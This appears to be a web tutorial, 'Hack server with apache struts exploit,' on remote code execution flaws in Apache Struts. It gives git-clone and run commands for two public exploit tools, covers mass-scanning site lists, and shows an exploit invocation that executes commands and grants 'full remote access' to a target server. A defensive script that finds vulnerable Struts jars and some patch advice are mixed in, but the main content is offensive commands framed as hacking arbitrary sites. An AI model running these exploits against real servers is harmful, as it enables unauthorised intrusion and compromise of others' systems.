
Hack server with apache struts exploit

Author: Rednofozi, Published: 01-11-2018
Description

A new and serious bug has once again been found in Apache Struts.

The vulnerability is of the RCE (remote code execution) type.

It affects versions 2.3 to 2.3.34 and 2.5 to 2.5.16.

To secure the server, be sure to update Struts to the latest version.
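To find out which deployments still need that update, the sketch below walks a directory tree and flags every `struts2-core` jar whose version falls inside the affected ranges given above. It is an added example, not part of the original article or of either tool, and it assumes the jar keeps its default `struts2-core-<version>.jar` file name; the sample tree is constructed.

```python
import re
import tempfile
from pathlib import Path

# Affected ranges (inclusive) exactly as stated on this page.
AFFECTED_RANGES = [((2, 3, 0), (2, 3, 34)), ((2, 5, 0), (2, 5, 16))]
# Assumption: the jar keeps its default name, struts2-core-<version>.jar.
JAR_NAME = re.compile(r"^struts2-core-(\d+(?:\.\d+){1,3})\.jar$")


def parse_version(text):
    """'2.5' -> (2, 5, 0); '2.3.16.3' -> (2, 3, 16, 3)."""
    parts = [int(p) for p in text.split(".")]
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(version):
    """True if the version falls inside one of the ranges above."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


def find_struts_jars(root):
    """Return (path, version, affected) for every struts2-core jar under root."""
    hits = []
    for jar in sorted(Path(root).rglob("struts2-core-*.jar")):
        match = JAR_NAME.match(jar.name)
        if match:
            hits.append((str(jar), match.group(1), is_affected(match.group(1))))
    return hits


if __name__ == "__main__":
    # Constructed sample tree: empty files standing in for deployed jars.
    with tempfile.TemporaryDirectory() as root:
        lib = Path(root, "showcase", "WEB-INF", "lib")
        lib.mkdir(parents=True)
        for name in ("struts2-core-2.3.34.jar", "struts2-core-2.5.17.jar"):
            (lib / name).touch()
        for path, version, affected in find_struts_jars(root):
            print("AFFECTED" if affected else "ok      ", version, path)
```

Point `find_struts_jars` at the application server's deployment directory; jars that were renamed or bundled inside a WAR or fat jar will not be found by file name alone.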

This vulnerability can be used in a variety of ways, but in this tutorial, we introduce two tools that are easy to use.


Testing the server using the first method

First, make sure Python 2 or 3 is installed on the system where you will run the tool, because the tool is written in Python.

Download the tool from the download section at the bottom of the page. To download it as a folder on Linux, use the following command:

git clone link

Then enter the downloaded folder, which contains the main tool, with the following command:

cd struts-pwn_CVE-2018-11776

To check whether a site is vulnerable, pass its address as shown below:

python3 struts-pwn.py -url https://site.com/struts2-showcase/index.action

If you want to check multiple websites at once, save their addresses in a file and pass that file to the program as a list:

python3 struts-pwn.py -list list-site.txt

Use the following command to use this vulnerability:

python3 struts-pwn.py -exploit -url 'https://site.com/struts2-showcase/index.action' -c id

Second method: the second tool

The second tool we introduce covers the vulnerabilities with the following identifiers:

CVE-2013-2251
CVE-2017-5638
CVE-2018-11776


First download the tool from the download section

git clone link

Then enter the downloaded folder

cd Apache-Struts-v3

Now run the tool with the following command

python ApacheStruts.py

Once the tool is running, it does not need command-line switches; every option you want to use is available inside the tool.

Enter the link of the site you want into the running tool, and it runs the exploit if the site is vulnerable.

You then have full remote access and can execute your commands on the site's server.

Conclusion

The first tool introduced is a relatively simpler way to test the server, but the second tool gives you more options.

Your choice depends on your type of work. To protect against this security hole, be sure to update all installed server packages.


Download tools

The first tool
https://github.com/mazen160/struts-pwn_CVE-2018-11776.git


Second tool
https://github.com/s1kr10s/Apache-Struts-v3.git
